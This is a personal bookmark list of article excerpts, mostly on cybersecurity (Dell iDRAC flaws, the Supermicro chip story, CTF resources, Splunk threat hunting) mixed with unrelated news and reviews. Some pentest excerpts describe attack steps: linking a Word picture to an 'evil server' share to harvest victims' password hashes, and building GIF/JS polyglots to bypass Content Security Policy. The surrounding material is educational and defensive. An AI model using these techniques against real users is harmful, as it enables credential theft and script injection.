LifePort | Home
Design interiors for custom applications on fixed and rotor wing aircraft
medical  airline  helicoper  military 
10 days ago
A Brain-Eating Amoeba Just Claimed Another Victim | WIRED
Naegleria fowleri are given miltefosine, a highly controlled experimental drug that has shown promise in treating PAM.

symptoms of Naegleria infection look flu-like at first, and later like other, more common forms of meningitis. PAM is very, very rare; since 1962, the CDC has recorded just 143 case reports—
medical  health  bacteria  brain  water 
10 days ago
IBM fired me because I'm not a millennial, says axed cloud sales star in age discrim court row • The Register
Langley, of Texas, USA, was seemingly doing very well for himself within Big Blue. For instance, he netted a $20,000 performance bonus in January 2017, the largest such windfall within his team in Austin, we're told. His annual performance scores put him at the top or near the top of his group.

Curiously, the month before, though, he was warned privately by his boss's boss – Andrew Brown, veep of worldwide sales of IBM's hybrid cloud software – that he needed to look for a new job, it is claimed. At the end of March 2017, Langley was formally told he would be laid off at the end of June.

Langley was laid off after his supervisor Kim Overbay ranked him, in January 2017, as the worst performing person on his team, despite him bagging the biggest bonus that quarter, and earlier meeting or exceeding performance expectations, according to the lawsuit.
ibm  career  ageism  legal 
11 days ago
iDRACula Vulnerability Impacts Millions of Legacy Dell EMC Servers
I am not a security researcher. I will say that Dell EMC did a good job communicating with myself (knowing we would be running a story) and with the individual who took advantage of iDRACula. The server industry has seen a number of severe security issues this year, including the recent Intel L1TF / Foreshadow disclosure. Seeing Dell EMC’s security apparatus work quickly on this was welcome.
dell  motherboard  cybersecurity  vulnerability  drac 
11 days ago
Screwed SAP salesman scores $660,000 jury award • The Register
Its argument? That the salesman only gets paid when the customer pays SAP and that he can only get commissions while still working at the company. So even though he did the work and closed the deals, the company didn't get paid until after it had fired him, so he didn't deserve any compensation.
sap  legal  sales  theregister 
11 days ago
You dirty DRAC: IT bods uncover Dell server firmware security slip • The Register
Jon Sands and Adam Nielsen discovered and reported via Serve The Home a bug dubbed iDRACula because it involves Dell's iDRAC service. iDRAC is software that runs on the baseband management controller (BMC) inside a PowerEdge system independent of whatever hypervisor, operating system, and applications are running.

It has full control over the hardware. Administrators can connect over the network to a server's iDRAC to diagnose and fix up any problems. It's a lot easier to fire up a web browser, and remotely power cycle the box or reinstall its OS, than locate, pull out, repair, and re-rack a system by hand, for instance.

The weakness is said to be present in 12th and 13th Dell EMC PowerEdge generations. The latest machines, 14th-gen and up, are not vulnerable because they introduced a root-of-trust in the BMC processor, meaning only Dell-authorized code can run on the controller, and not junk injected by hackers.
cybersecurity  dell  motherboard  drac  firmware  vulnerability 
11 days ago
The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg
Apple made its discovery of suspicious chips inside Supermicro servers around May 2015, after detecting odd network activity and firmware problems, according to a person familiar with the timeline. Two of the senior Apple insiders say the company reported the incident to the FBI but kept details about what it had detected tightly held, even internally. Government investigators were still chasing clues on their own when Amazon made its discovery and gave them access to sabotaged hardware, according to one U.S. official. This created an invaluable opportunity for intelligence agencies and the FBI—by then running a full investigation led by its cyber- and counterintelligence teams—to see what the chips looked like and how they worked.

The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow.

telling the device to communicate with one of several anonymous computers elsewhere on the internet that were loaded with more complex code; and preparing the device’s operating system to accept this new code. The illicit chips could do all this because they were connected to the baseboard management controller, a kind of superchip that administrators use to remotely log in to problematic servers, giving them access to the most sensitive code even on machines that have crashed or are turned off.

implanted chips were designed to ping anonymous computers on the internet for further instructions, operatives could hack those computers to identify others who’d been affected. Although the investigators couldn’t be sure they’d found every victim, a person familiar with the U.S. probe says they ultimately concluded that the number was almost 30 companies.

sophisticated designs than they’d previously encountered. In one case, the malicious chips were thin enough that they’d been embedded between the layers of fiberglass onto which the other components were attached

Every Supermicro server, all 7,000 or so, was replaced in a matter of weeks, the senior insider says. (Apple denies that any servers were removed.) In 2016, Apple informed Supermicro that it was severing their relationship entirely—a decision a spokesman for Apple ascribed in response to Businessweek’s questions to an unrelated and relatively minor security incident. That August, Supermicro’s CEO, Liang, revealed that the company had lost two major customers.

A belief formed that China was unlikely to jeopardize its position as workshop to the world by letting its spies meddle in its factories.
“You can have less supply than you want and guarantee it’s secure, or you can have the supply you need, but there will be risk. Every organization has accepted the second proposition.”

In the three years since the briefing in McLean, no commercially viable way to detect attacks like the one on Supermicro’s motherboards has emerged—or has looked likely to emerge.
backdoor  china  motherboard  cybersecurity  supplychain  amazon 
12 days ago
The Big Hack: Inside the Bag of Tech Tricks Used by China Spies - Bloomberg
According to U.S. officials with knowledge of the investigation, operatives from a unit of the People’s Liberation Army inserted the chips during the manufacturing process. U.S. agencies traced the chips to subcontracting factories that built motherboards for a San Jose-based company called Super Micro Computer Inc. In some cases, middlemen—claiming to be Supermicro representatives or suggesting that they had ties to government—approached plant managers. They used bribes or threats of inspections that could slow or halt production to ram through changes to motherboards’ original designs.
supplychain  cybersecurity  china  amazon  hardware  firmware 
12 days ago
CTFs · GitHub
Wiki-like CTF write-ups repository, maintained by the community.
ctf  forensicschallenge  training  cybersecurity 
13 days ago
Bypassing Content Security Policy with a JS/GIF Polyglot (old 2015)
This post explains the creation of a JS/GIF polyglot to bypass Content Security Policy (CSP) in certain scenarios. We will build a custom polyglot file that is a valid GIF as well as JavaScript and use Xenotix to simulate real world exploitation.

Your PoC JS code can be just "alert(0)" or for Red Team Pentesting I would suggest you to use OWASP Xenotix XSS Exploit Framework (as I wrote it) or Beef (an alternative). In this post I will be using Xenotix.

Download Latest Xenotix from http://xenotix.in
polyglot  javascript  gif  xss 
13 days ago
GIF/Javascript Polyglots: Abusing GIFs, tags, and MIME types for evil - Web Hacking - 0x00sec - The Home of the Hacker
use fake webserver source to present application/octet-stream MIME type for image

This uses SimpleHTTPServer, which is already in Python’s standard libraries, to serve the contents of the local directory. By default, SimpleHTTPServer will try and give things appropriate MIME types based on extensions, so we add a small change to tell it to interpret .gif extensions as application/octet-stream, which browsers will execute. If I named that html file as index.html, I can now hit 5 and get our malicious gif served back with a MIME type that it is okay with executing. The result? We run the JS compiled into the GIF.

This is not a new or novel attack. This is also not something I feel is widely exploitable, but it is fairly sneaky and exposes a few areas of trust that we can abuse.

Browsers do little in the way of actual heuristics when trying to determine file type. At best, they will look at the extension and magic byte to try and determine if the file is what it claims to be.
This is a valid GIF and a valid bit of JS, so heuristics would have to be more sophisticated to catch something like this.
Browsers trust MIME types perhaps a bit too much.
This would be easy to exploit and hard to detect using a site you control, since users wouldn’t be able to see the JS that is being executed.
Then again, they might see that something.js was being executed but might not be able to GET the file to see what is in it.
Obfuscation level: 3/10.
javascript  jpeg  polyglot  cybersecurity 
13 days ago
Bypassing CSP using polyglot JPEGs | Blog
In conclusion if you allow JPEG uploads on your site or indeed any type of file, it's worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it's also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn't be possible without the excellent work of Ange Albertini. I used his JPEG format graphic extensively to create the polyglot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.


Mozilla are fixing this in Firefox 51.
polyglot  javascript  jpeg  firefox  cybersecurity 
13 days ago
Practice CTF List / Permanant CTF List
Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.

http://pwnable.tw/ (a newer set of high quality pwnable challenges)
http://pwnable.kr/ (one of the more popular recent wargaming sets of challenges)
https://picoctf.com/ (Designed for high school students while the event is usually new every year, it's left online and has a great difficulty progression)
https://microcorruption.com/login (one of the best interfaces, a good difficulty curve and introduction to low-level reverse engineering, specifically on an MSP430)
http://ctflearn.com/ (a new CTF based learning platform with user-contributed challenges)
ctf  cybersecurity  training  reference  forensicschallenge 
13 days ago
Tools and Resources to Prepare for a Hacker CTF Competition or Challenge
CTF Competitions on Hacker Conferences or Gatherings and Wargames

DEFCON CTF – one of the most prestigious and challenging CTF ever in DEFCON which is currently organized by Legitimate Business Syndicate
picoCTF – a CTF targeted for middle and high school students
Ghost in the Shellcode – an annual CTF which is hosted in ShmooCon Hacker Convention
ROOTCON Campus Tour CTF – is the first ever inter-university CTF challenge in the Philippines which is open to all college students
ROOTCON CTF – is the official CTF of ROOTCON Hacker Conference
CSAW CTF – by NYU Policy
HSCTF – known to be the first CTF made by high school students and for high school students
UCSB iCTF – the UCSB International Capture The Flag is organized by Prof. Giovanni Vigna of the Department of Computer Science at UCSB, and is held once a year (usually at the beginning of December, but it has been rescheduled a few times)
Infosec Institute CTF – our very own CTF Labs
Smash the Stack – a war gaming network which simulates software vulnerabilities and allows for the legal execution of exploitation techniques
OverTheWire – another war gaming network
Embedded Security CTF
DefCamp CTF – the official CTF of DEFCAMP
Trend Micro CTF Asia Pacific & Japan – a CTF event hosted by Trend Micro
More upcoming events are in CTF Time…

CTF Guides and Resources

Trail of Bits CTF Guide – one of the best guides for newbies
Practice CTF List / Permanent CTF List – a good collection and resource of CTFs that are long-running
Awesome CTF – a curated list of Capture The Flag (CTF) frameworks, libraries, resources and software
Vulnhub – vulnerable machines you can practice or for your pentest laboratory
CTF Resources – a repository and an archive of general topics for CTF and is somehow the same with Trail of Bits CTF Guide
Reddit’s securityCTF – /r/securityCTF
Forensics Wiki – a wiki designed for computer forensics
ctf  resources  reference  training 
13 days ago
LoJax: First UEFI rootkit found in the wild, courtesy of the Sednit group
Caveat: "The tool described above is able to update the system’s firmware only if the SPI flash memory protections are vulnerable or misconfigured. Thus, you should make sure that you are using the latest available UEFI/BIOS available for your motherboard. Also, as the exploited vulnerability affects only older chipsets, make sure that critical systems have modern chipsets with the Platform Controller Hub (introduced with Intel Series 5 chipsets in 2008)."
cybersecurity  uefi  malware  rootkit  bios 
13 days ago
DFRWS 2016 SDN Forensics Challenge
Four teams participated in this year's challenge and did excellent work. Congratulations to the winning team from Booz Allen! A summary of the challenge, scenario details, results, and the winning solution are available for download:

Results Presentation (@DFRWS Seattle Aug, 2016)
Winning submission
sdn  forensics  pcap 
13 days ago
Linksys Worm ("TheMoon") Captured - SANS Internet Storm Center
One important update: This affects other Linksys routers as well. For example, we do have some routers connecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4)
linksys  malware  sans  forensics  router 
14 days ago
Why and How to Calibrate Your Lenses for Razor-Sharp Autofocus - Petapixel
First, you’ll need to place your camera and selected lens at the appropriate distance from the ruler. This distance is dependent on the focal length of the lens you’re calibrating and the easiest thing to do is check the details on this super handy chart from LensAlign. Their Distance Tool allows you to input your camera sensor size, your focal length and minimum aperture and it’ll give you the optimum distance you’ll need to do the test. Input your numbers and then set up your camera at the appropriate distance as recommended by the site.
petapixel  focus  calibration  camera  howto 
15 days ago
GitHub - salesforce/ja3: JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
JA3 is a method for creating SSL/TLS client fingerprints that are easy to produce and can be easily shared for threat intelligence.

This repo includes JA3 scripts for Bro and Python.
cybersecurity  ssl  tls  signature 
15 days ago
Rufus - Create bootable USB drives the easy way
Rufus is a utility that helps format and create bootable USB flash drives, such as USB keys/pendrives, memory sticks, etc.
usb  boot  windows  software 
15 days ago
mhassan2 (Mohamad Hassan) · GitHub
Docker Splunk Orchestration script (6,000+ lines) to create fully automated pre-configured splunk site-2-site clusters or stand alone containers for your lab/training. Awesome tool for training and…
splunk  docker  github  script  orchestration 
18 days ago
Popular Weed Killer May Be Responsible for Global Bee Deaths - Motherboard
The chemical glyphosate is the active ingredient in Roundup, a potent herbicide sold by Monsanto, and other similar products. A new study by researchers at the University of Texas at Austin found that it destroys bees’ specialized gut bacteria, exposing them to infection by deadly bacteria.

Glyphosate is the world’s best-selling herbicide, despite its links to cancer in humans. It works by targeting an enzyme in plants and some microorganisms known as EPSPS, or 5-enolpyruvylshikimate-3-phosphate synthase. According to the study, bee gut bacteria also contains this enzyme, which helps to ward off infections and regulate overall health.

When the scientists exposed bees to the Roundup ingredient, the bees’ healthy bacteria decreased, disrupting their microbiome—a mini-ecosystem of gut microbes responsible for all manner of tasks, such as blocking pathogenic invaders and processing food.
bees  microbiome  bacteria  poison  cancer  environment 
19 days ago
A Major Bug In Bitcoin Software Could Have Crashed the Currency - Motherboard
On Tuesday, the developers of Bitcoin Core—the software that effectively powers the Bitcoin blockchain—released a new version that patched a vulnerability that allowed a malicious user to crash the network, making everyone’s digital coins effectively useless. The bug has been variously described as “very scary,” “major,” and one of the “top three or four” most serious bugs ever discovered in Bitcoin.
“For less than $80,000, you could have brought down the entire network,” Emin Gün Sirer, an associate professor of computer science at Cornell University told me over the phone. “That is less money than what a lot of entities would pay for a 0-day attack on many systems. There are many motivated people like this, and they could have brought the network down.”
bitcoin  cryptocurrency  vulnerability 
19 days ago
20/20 malware vision - SANS Internet Storm Center
Here I use Python's map function to calculate the difference between the numerical value of the cleartext string and the obfuscated string:
I can see the difference is always -11. So you just need to subtract 11 from each character to get the deobfuscated string (using translate.py):
cybersecurity  forensics  python  visualbasic  malware  todo 
19 days ago
Positive Technologies - learn and secure : Positive Technologies researcher finds vulnerability enabling disclosure of Intel ME encryption keys
Intel has issued a patch in response to a serious vulnerability in Intel ME firmware discovered by Positive Technologies expert Dmitry Sklyarov. The vulnerability involved security mechanisms in the MFS file system, which Intel ME uses to store data. By exploiting this flaw, attackers could manipulate the state of MFS and extract important secrets
intel  cybersecurity  vulnerability  cpu 
19 days ago
Dissecting Malicious MS Office Docs - SANS Internet Storm Center
office documents are essentially zipped-up xml files.  In native powershell you'd execute:

$targetfile = "C:\full\path\to\doc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($targetfile)
$xmlout = New-Object System.XML.XMLDocument
$xmlout = [xml]$doc.WordOpenXML
$targetrel = $xmlout.package.part.xmlData.Relationships.Relationship
$targetrel | ft

L:\cust\sans\isc\honeydoc> $targetrel | fl | sls "\\"
Target     : file:///\\\test\cmd.png

Note that the full path seems to be needed in $targetfile - ("./" doesn't cut it as a path.)

WARNING - using the com object word.application actually opens the file using the application, so this actually opens word and then triggers the attack, sending the password hash of the account in use

A better approach might be to use DocumentFormat.OpenXML. Before you go there, you'll need to install the OpenXML SDK first, find it at https://www.microsoft.com/en-us/download/details.aspx?id=30425

A script using this method might look like:

[System.Reflection.Assembly]::LoadFrom("C:\Program Files (x86)\Microsoft Office\Office15\DCF\DocumentFormat.OpenXml.dll")
$file="L:\cust\sans\isc\honeydoc\smb trap 4.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets | fl | grep "file://"
Uri : file://

At this point you can dissect things even further:
PS L:\cust\sans\isc\honeydoc> $targets.Uri

AbsolutePath : /test/cmd.png
AbsoluteUri : file://
LocalPath : \\\test\cmd.png
Authority :
HostNameType : IPv4
IsDefaultPort : True
IsFile : True
IsLoopback : False
PathAndQuery : /test/cmd.png
Segments : {/, test/, cmd.png}
IsUnc : True
Host :
Port : -1
Query :
Fragment :
Scheme : file
OriginalString : file:///\\\test\cmd.png
DnsSafeHost :
IdnHost :
IsAbsoluteUri : True
UserEscaped : False
UserInfo :

Adding these 2 lines to the script fills the "just give me the malicious host" requirement:

foreach ($t in $targets) {
if ($t.uri.isunc) {echo $t.uri.Host} }
cybersecurity  msoffice  forensics  script  powershell  todo 
19 days ago
Using Certificate Transparency as an Attack / Defense Tool - SANS Internet Storm Center
Anyway, the Cert Transparency program has Certificate Authorities keeping a transparent log of EV certificates since Jan 1, 2015, and logs for DV and OV certificates as of May 2, 2018 (more here: https://www.certificate-transparency.org/ ).  This means that there are central, queryable repos for all SSL certificates.  As soon as I hear "central database" and "API", I tend to ask "how can I use that for other purposes" - for instance, how can I use that in Penetration Tests?

https://crt.sh/?q=sans.org gets us a nice list of certs

Entrust interface at https://www.entrust.com/ct-search/ is a bit easier to navigate, but doesn't have that easy ability to translate a browser based query to a curl or other script based approach.

Where else can you find a decent interface to a certificate transparency feed? So far, I've been using:

This gives you pretty much everything, including the ability to download the certificates themselves, export to excel or csv.

Of course there's a Google interface to search certificates. And of course it's extremely complete - if there's info to find, it'll be easy to find in this one!
tls  certificates  cybersecurity  threathunting  pentest 
19 days ago
Let's Trade: You Read My Email, I'll Read Your Password! - SANS Internet Storm Center
How do you place a link like this? In MS Word for instance:

Insert / Picture - point the link to \\ip.of.your.evil.server\share\filename
This file does need to exist in current versions of Word - I tend to just change my laptop's IP temporarily for this step
Resize this file so that it's small enough to be missed as the client looks at the document.
Be sure to choose "insert and link" - this will force the graphic to update when you open the file.

When your victim / customer opens the file, they'll send their credentials (userid and password hash) to your server. This shows that information being received in Responder:

Works in Word, Excel, PowerPoint, Publisher, etc..
cybersecurity  windows  msoffice  smb  pentest  password 
19 days ago
Certificates Revisited - SSL VPN Certificates 2 Ways - SANS Internet Storm Center
all the certificates for the Cisco AnyConnect VPN profiles in your list? That'd be handy to head off those emergency cert expiry calls.

First of all, AnyConnect profiles are all stored as XML files in C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Profile, which means we can get the list in PowerShell like this:
powershell  cisco  vpn  tls 
19 days ago
The danger of sending information for API consumption without adequate security measures - SANS Internet Storm Center
API that is consumed to perform the authentication of a fingerprint that was read through an APP located in a mobile phone. The fingerprint is digitalized using the Wavelet Scalar Quantization (WSQ) Gray-scale Fingerprint Image Compression Algorith
fingerprint  cybersecurity  api  biometrics 
19 days ago
Encrypting SNI: Fixing One of the Core Internet Bugs
One solution to this problem was to create certificates with multiple Subject Alternative Names (SANs). These certificates would encrypt traffic for multiple domains that could all be hosted on the same IP. This is how Cloudflare handles HTTPS traffic from older browsers that don't support SNI. We limit that feature to our paying customers, however, for the same reason that SANs aren't a great solution: they're a hack, a pain to manage, and can slow down performance if they include too many domains.

The more scalable solution was SNI. The analogy that makes sense to me is to think of a postal mail envelope. The contents inside the envelope are protected and can't be seen by the postal carrier. However, outside the envelope is the street address which the postal carrier uses to bring the envelope to the right building. On the Internet, a web server's IP address is the equivalent of the street address.

In the United States, ISPs were briefly restricted in their ability to gather customer browsing data under FCC rules passed at the end of the Obama administration. ISPs, however, lobbied Congress and, in April 2017, President Trump signed a Congressional Resolution repealing those protections. As ISPs increasingly acquire media companies and ad targeting businesses, being able to mine the data flowing through their pipes is an increasingly attractive business for them and an increasingly troubling privacy threat to all of us.
cybersecurity  privacy  tls  dns  cloudflare 
20 days ago
Hunting for Suspicious Processes with OSSEC - SANS Internet Storm Center
OSSEC is a free security monitoring tool/log management platform which has many features related to detecting malicious activity on a live system like the rootkit detection or syscheck modules. Here is an example of rules that can be deployed to track malicious processes running on a host (it can be seen as an extension of the existing rootkit detection features).
threathunting  cybersecurity  monitoring  ossec 
20 days ago
Where have all my Certificates gone? (And when do they expire?) - SANS Internet Storm Center
ran theharvester (it's part of Kali) to find the *other* bits and pieces of infrastructure that might be in play.
Theharvester is a nice open source intelligence tool starts with various search
cybersecurity  tls  cert  kali  howto 
20 days ago
Review: 6 slick open source routers | InfoWorld
DD-WRT, Tomato, OpenWrt, OPNsense, PFSense, and VyOS suit a wide range of devices and networking needs
router  software  foss  cybersecurity 
25 days ago
YouTube now supports 4k-resolution videos - CNET
Thought 1080p video on YouTube was big? Think bigger. (JULY 9, 2010)

YouTube on Friday announced that its player now supports 4k, a standard resolution for films that measures 4096x3072 pixels. As YouTube Engineer Ramesh Sarukkai explained in the announcement on YouTube's official blog, "4K is nearly four times the size of 1080p," and it dwarfs even Imax, which projects films in the slightly smaller 2k format, with its 2048×1080-pixel resolution
4k  youtube  history 
26 days ago
3 Ways A.I. and AR Will Transform Your Company | Inc.com
The greatest ideas hardly ever come from using 20% time away from work. They hardly ever come from the innovation lab. They come from busy people who had ideas while doing their day job, stayed late, and tried things without getting permission. They don't come from companies who drive innovation. They don't come from companies who celebrate innovation. But they come from companies who allow their people to try new things and fail without consequences. They come from companies that have the right climate for employees to be creative. They come from people who do those things that allow them to generate great ideas. 
innovation  google 
27 days ago
The Best Laser Printer for 2018 - Reviews.com
HP take both of our top spots. While the brand receives recognition for its reliability...took our top spot for black and white laser printer because it was straightforward to use and produced the most precise text and lines.

Brother L2340dw as the more popular option for black and white printers...the printers are direct clones of each other and can even hold each other's paper trays. With no discernible difference except for the cheaper price of the Dell, we recommend the Dell 5310dw.

HP LaserJet Pro M203dw Printer = Black-and-White Laser Printer
HP Color LaserJet Pro M252dw = Color Laser Printer
Dell E310dw / Brother L2340 = Budget Printer
Canon Color imageCLASS LBP612Cdw = Precise Color Tones
printer  review  laserprinter  shopping 
4 weeks ago
Balmhorn - Bing
Mountaineers on the Balmhorn, Switzerland
mountaineering  switzerland  photo 
5 weeks ago
Moskenes, Norway - Bing
Looking toward Mt. Olstinden in Moskenes, Norway
norway  moskenes  lofoten  bing  photo 
5 weeks ago
Use Test-NetConnection to Replace Ping > Think PowerShell
PS C:\Users\aaron> Test-NetConnection -ComputerName thinkpowershell.com -Port 443

ComputerName : thinkpowershell.com
RemoteAddress :
RemotePort : 443
InterfaceAlias : Ethernet 2
SourceAddress :
PingSucceeded : True
PingReplyDetails (RTT) : 44 ms
TcpTestSucceeded : True

PS C:\Users\aaron> If (Test-NetConnection -ComputerName thinkpowershell.com -Port 443 -InformationLevel Quiet) {
Write-Host "thinkpowershell.com is listening on port 443."
}
thinkpowershell.com is listening on port 443.
powershell  techsupport  networking 
5 weeks ago
Researchers Detail Two New Attacks on TPM Chips
The attack scenario involves an attacker abusing power interrupts and TPM state restores to obtain valid hashes for components involved in the boot-up process, which the attacker then feeds back to the same SRTM-configured TPM, tricking it into thinking it's running on non-tampered components.
tpm  cybersecurity  vulnerability 
5 weeks ago
Attorney For Homeless Man: All The Money In GoFundMe Fundraiser For Him Is Gone | Daily Wire
defense attorney said that Bobbitt received $200,000 dollars from the money donated.

McClure and D'Amico set up the GoFund Me with claims they would buy Bobbitt a house and set up two trusts. It never happened.”
...used to take expensive trips, go on shopping sprees, and gamble.
...used BMW John Bobbitt says the couple purchased earlier this year. He suspects the GoFundMe $ raised for him was used to buy it
homeless  gofundme  scandal 
5 weeks ago
Splunk Enterprise Security: How to remove a notable event from the "Security Posture" dashboard after investigation? - Question | Splunk Answers
set search condition: status_group="New"

| `es_notable_events` | search timeDiff_type=current status_group="New" | stats sparkline(sum(count),30m) as sparkline,sum(count) as count by rule_name | sort 100 - count
5 weeks ago
ThreatStream Matches As Notable Events in Splunk? Here's How...
The search looks like this:

| `ts_tstats_all` | `ts_lookup_details` | `ts_get_time_offset(_time, ts_date_last)` | where ts_confidence >= 80 AND Age < 31 AND (like(ts_itype, "apt%") OR like(ts_itype, "c2%") OR like(ts_itype, "mal%")) | eval orig_sourcetype=sourcetype
splunk  anomali  threatstream  threathunting  cyberthreatintel 
5 weeks ago
Building Integrations for Splunk Enterprise Security | Splunk
Splunk ES - includes prepackaged dashboards, correlations, and incident response workflows to help security teams analyze and respond to their network, endpoint, access, malware, vulnerability, and identity information.

Use Frameworks: Notable Events, Asset & Identity, Threat Intelligence, Risk, Adaptive Response
splunk  cybersecurity  siem  threathunting 
5 weeks ago